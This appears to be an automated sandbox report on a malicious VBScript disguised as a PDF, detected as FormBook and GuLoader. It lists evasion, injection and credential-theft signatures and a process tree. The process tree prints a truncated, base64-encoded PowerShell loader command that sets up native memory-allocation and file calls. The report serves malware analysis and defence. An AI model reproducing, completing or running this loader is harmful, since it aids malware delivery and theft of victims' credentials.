Windows
Analysis Report
Wire-84844663637346665.PDF.vbs
Overview
General Information
Detection
FormBook GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%
Signatures
Found malware configuration
Detected FormBook malware
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Hides threads from debuggers
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Potential evasive VBS script found (sleep loop)
Maps a DLL or memory area into another process
Tries to detect Any.run
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (suspicious strings)
Potential malicious VBS script found (has network functionality)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Encrypted powershell cmdline option found
Very long command line found
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses an obfuscated file name to hide its real file extension (double extension)
Tries to harvest and steal browser information (history, passwords, etc)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Sigma detected: Suspicious Csc.exe Source File Folder
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Sigma detected: Suspicious Execution of Powershell with Base64
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Classification
- System is w10x64
- wscript.exe (PID: 6204 cmdline: C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\Wire-84844663637346665.PDF.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
- powershell.exe (PID: 6480 cmdline:
C:\Windows \SysWOW64\ WindowsPow erShell\v1 .0\powersh ell.exe" - EncodedCom mand "IwBC AGEAYwBvAG 4AZwAgAFMA bABlAHQAbg AgAEYARQBK AEwAUABMAE EAIABWAGkA bgBkAGYAbA A0ACAAZgBh AHIAYQAgAG EAcgB0AGUA cgAgAE8Adg BlAHIAYQBy AG8AIABDAE kATgBFAE4A RQBHACAARA BkAHMAbwBm AHIAZQByAD EAIABCAFIA SQBUAFQATA BFAFAAQQAg AFMAZQBtAG kAYwBvAHIA bwBuACAAQg B1AG4AZABk AHkAcgBlAD EAIABVAE4A TQBBAE4AQQ BHACAAUgBJ AEMATwBDAE gARQBUACAA aABlAG4Acg BlAGcAbgAg AEkAbgBkAG QAZQBsAGkA bgBnAGUAMQ AgAFIATwBU AEEAVABJAC AATwB2AGUA cgBmAG8AZA ByAGUAcwAx ACAAUQBVAE kARQBUACAA YQByAGEAYg BhAG4AIABJ AE4ARABEAC AAdQBiAGUA dABpAG0AZQ AgAGEAawB0 AGkAdgBpAH MAdAAgAHAA ZQByAHQAdQ ByAGIAZgAg AEoAQQBHAE UAUgBFAE4A IABLAEkATA BPAE0ARQBH AEEAIABBAG MAaABvAG4A ZAByACAAQg BuAG4AZQAg AEMAbwBuAG cAcgBlAGcA MwAgAEIAUg BBAE4ARABF AE4AIABJAG 4AZwBlAG4A aQByAHQAMg AgAFIAZQB2 AG8AIABTAG MAaQByACAA DQAKAA0ACg ANAAoAQQBk AGQALQBUAH kAcABlACAA LQBUAHkAcA BlAEQAZQBm AGkAbgBpAH QAaQBvAG4A IABAACIADQ AKAHUAcwBp AG4AZwAgAF MAeQBzAHQA ZQBtADsADQ AKAHUAcwBp AG4AZwAgAF MAeQBzAHQA ZQBtAC4AUg B1AG4AdABp AG0AZQAuAE kAbgB0AGUA cgBvAHAAUw BlAHIAdgBp AGMAZQBzAD sADQAKAHAA dQBiAGwAaQ BjACAAcwB0 AGEAdABpAG MAIABjAGwA YQBzAHMAIA BIAGEAbgBk AGwAMQANAA oAewANAAoA WwBEAGwAbA BJAG0AcABv AHIAdAAoAC IAbgB0AGQA bABsAC4AZA BsAGwAIgAp AF0AcAB1AG IAbABpAGMA IABzAHQAYQ B0AGkAYwAg AGUAeAB0AG UAcgBuACAA aQBuAHQAIA BOAHQAQQBs AGwAbwBjAG EAdABlAFYA aQByAHQAdQ BhAGwATQBl AG0AbwByAH kAKABpAG4A dAAgAEgAYQ BuAGQAbAA2 ACwAcgBlAG YAIABJAG4A dAAzADIAIA BOAE8ATgBN AEEATABJAE cALABpAG4A dAAgAG0AZQ B0AGEAdABl AGcAbgAsAH IAZQBmACAA SQBuAHQAMw AyACAASABh AG4AZABsAC wAaQBuAHQA IABCAG8Acg BkAHMAawA2 ACwAaQBuAH QAIABIAGEA bgBkAGwANw ApADsADQAK AFsARABsAG wASQBtAHAA bwByAHQAKA AiAGsAZQBy AG4AZQBsAD MAMgAuAGQA bABsACIAKQ BdAHAAdQBi AGwAaQBjAC AAcwB0AGEA dABpAGMAIA BlAHgAdABl AHIAbgAgAE kAbgB0AFAA dAByACAAQw ByAGUAYQB0 AGUARgBpAG wAZQBBACgA cwB0AHIAaQ BuAGcAIABE AEEAVQBHAE gAVABFAFIA LAB1AGkAbg B0ACAAVABh AG4AegBhAG 4AaQA1ACwA aQBuAHQAIA BoAGEAYQBu ACwAaQBuAH 
QAIABIAGEA bgBkAGwAMA AsAGkAbgB0 ACAARgBhAG wAbABhAGMA aQBlAHMANQ AsAGkAbgB0 ACAAQgBHAE UAUgAsAGkA bgB0ACAAUQ B1AGkAbgBx AHUAZQA3AC kAOwANAAoA WwBEAGwAbA BJAG0AcABv AHIAdAAoAC IAawBlAHIA bgBlAGwAMw AyAC4AZABs AGwAIgApAF 0AcAB1AGIA bABpAGMAIA BzAHQAYQB0 AGkAYwAgAG UAeAB0AGUA cgBuACAAaQ BuAHQAIABS AGUAYQBkAE YAaQBsAGUA KABpAG4AdA AgAG0AZQB0 AGEAdABlAG cAbgAwACwA dQBpAG4AdA AgAG0AZQB0 AGEAdABlAG cAbgAxACwA SQBuAHQAUA B0AHIAIABt AGUAdABhAH QAZQBnAG4A MgAsAHIAZQ BmACAASQBu AHQAMwAyAC AAbQBlAHQA YQB0AGUAZw BuADMALABp AG4AdAAgAG 0AZQB0AGEA dABlAGcAbg A0ACkAOwAN AAoAWwBEAG wAbABJAG0A cABvAHIAdA AoACIAdQBz AGUAcgAzAD IALgBkAGwA bAAiACkAXQ BwAHUAYgBs AGkAYwAgAH MAdABhAHQA aQBjACAAZQ B4AHQAZQBy AG4AIABJAG 4AdABQAHQA cgAgAEMAYQ